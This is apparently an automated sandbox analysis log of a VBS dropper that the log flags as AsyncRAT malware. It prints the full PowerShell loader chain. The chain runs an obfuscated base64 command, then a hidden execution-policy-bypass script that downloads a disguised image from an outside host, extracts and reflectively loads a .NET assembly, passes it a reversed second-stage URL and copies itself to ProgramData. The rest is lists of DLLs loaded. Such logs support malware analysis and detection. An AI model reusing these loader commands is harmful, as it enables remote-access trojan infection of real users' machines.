gTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_01060EB87_2_01060EB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0106D4BC7_2_0106D4BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_051BC1C87_2_051BC1C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_051B70F07_2_051B70F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_051BDE907_2_051BDE90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_051BBBA07_2_051BBBA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_051B07387_2_051B0738
            Source: 72625413524.vbsInitial sample: Strings found which are bigger than 50
            Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.spre.troj.expl.evad.winVBS@13/10@8/4
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FIwXa[1].txtJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\0VZWHbNr1OapRPc5
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd31duw1.ibv.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
